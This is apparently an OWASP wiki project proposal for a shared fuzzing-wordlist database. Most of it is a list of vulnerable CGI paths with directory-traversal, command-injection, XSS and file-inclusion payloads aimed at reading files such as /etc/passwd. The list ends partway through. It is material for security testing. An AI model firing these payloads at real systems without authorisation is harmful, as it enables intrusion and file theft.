*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
